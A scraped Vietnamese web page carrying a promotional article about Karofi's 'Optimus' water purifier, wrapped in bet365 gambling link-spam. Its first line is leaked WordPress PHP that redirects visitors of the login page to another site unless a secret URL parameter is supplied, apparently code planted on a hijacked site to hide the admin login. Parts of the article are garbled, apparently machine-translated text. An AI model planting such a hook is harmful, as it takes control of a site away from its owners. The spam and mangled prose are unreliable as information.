//̨¼ add_action('login_enqueue_scripts','login_protection'); function login_protection(){ if($_GET['word'] != '2868973770')header('Location: https://www.baidu.com/'); } Karofi ra mắt sản phẩm mới mang tên "Captain Optimus" | bet365 việt nam_địa chỉ liên kết bet365_cách vào bet365

Karofi ra mắt sản phẩm mới mang tên “Captain Optimus”

Các fan của loạt phim “Transformers” vô cùng ngưỡng mộ nhân vật thuyền trưởng Optimus Prime. Máy lọc nước thông minh Karofi Optimus thế hệ mới lấy cảm hứng từ tính cách tiên phong của người đội trưởng Optimus Prime, dẫn dắt đồng đội chống lại cái ác, bảo vệ cuộc sống của nhân dân, có nhiều lợi thế trong ngành. Công nghệ lọc nước với thiết kế khoa học thông minh mang đến nguồn nước an toàn và đảm bảo sức khỏe cho người sử dụng.

Khác với các sản phẩm Karofi trước đây, Optimus đã cải tiến ngoại hình bằng cách kết hợp hai màu đen và trắng, dải màu thể hiện sự phức tạp và sang trọng. Vẻ ngoài của sản phẩm gây ấn tượng mạnh với người xem bởi sự sang trọng và lịch lãm, nó giống như một vật trang trí trong nhà hiện đại hơn là một chiếc máy lọc nước mà người tiêu dùng thường đặt trong gian bếp. .

Máy lọc nước Optimus mới nhất của Karofi.

Optimus kế thừa những ưu điểm vượt trội của máy lọc nước thông minh thương hiệu Karofi và tiếp tục được trang bị chỉ hiển thị số TDS (tổng hàm lượng chất rắn hòa tan). Water), cảnh báo mọi nguy cơ như cấp nước kém, thay lõi sắt chìa, rò rỉ nước …

Kết cấu khoa học sang trọng tạo cảm giác khi bạn chạm vào sản phẩm Optimus. -Máy lọc nước Karofi thế hệ mới còn được đầu tư sử dụng màng lọc Aquaast nổi bật của Dow Chemical. Màng thẩm thấu ngược thông thường chỉ có tỷ lệ thoát nước khoảng 40% và 60% đối với nước tinh khiết. Sau đó, sử dụng màng Ro Aqualast của Karofi cho Optimus, tỷ lệ thu hồi nước tinh khiết có thể đạt 70%. Ngoài ra, lớp màng này có thể tăng gấp đôi tuổi thọ và có thể xử lý nhiều nguồn nước, chẳng hạn như nước máy, nước giếng, nước lợ hoặc nước có chỉ số TDS lên đến 3000 ppm.

Màng RO Aqualast có tuổi thọ gấp đôi. Hiệu quả như màng thẩm thấu ngược truyền thống.

Với nhiều ưu điểm vượt trội, máy lọc nước Karofi Optimus được kỳ vọng sẽ trở thành sản phẩm được ưa chuộng tại hơn 6000 địa điểm. Doanh số bán hàng của Karofi ở trên. Trên toàn quốc, tiếp tục giữ vững vị thế dẫn đầu thị trường ngành lọc nước Việt Nam.

Karofi là thương hiệu chuyên cung cấp các giải pháp lọc nước, trong đó máy lọc nước RO Karofi và cây nước nóng lạnh là hai dòng sản phẩm được hơn một triệu gia đình Việt tin dùng. Đăng ký trải nghiệm tại đây hoặc hotline 1900 6418 để trải nghiệm máy lọc nước Karofi Optimus .

(Nguồn: Karofi)

Leave a comment

bet365 việt nam_địa chỉ liên kết bet365_cách vào bet365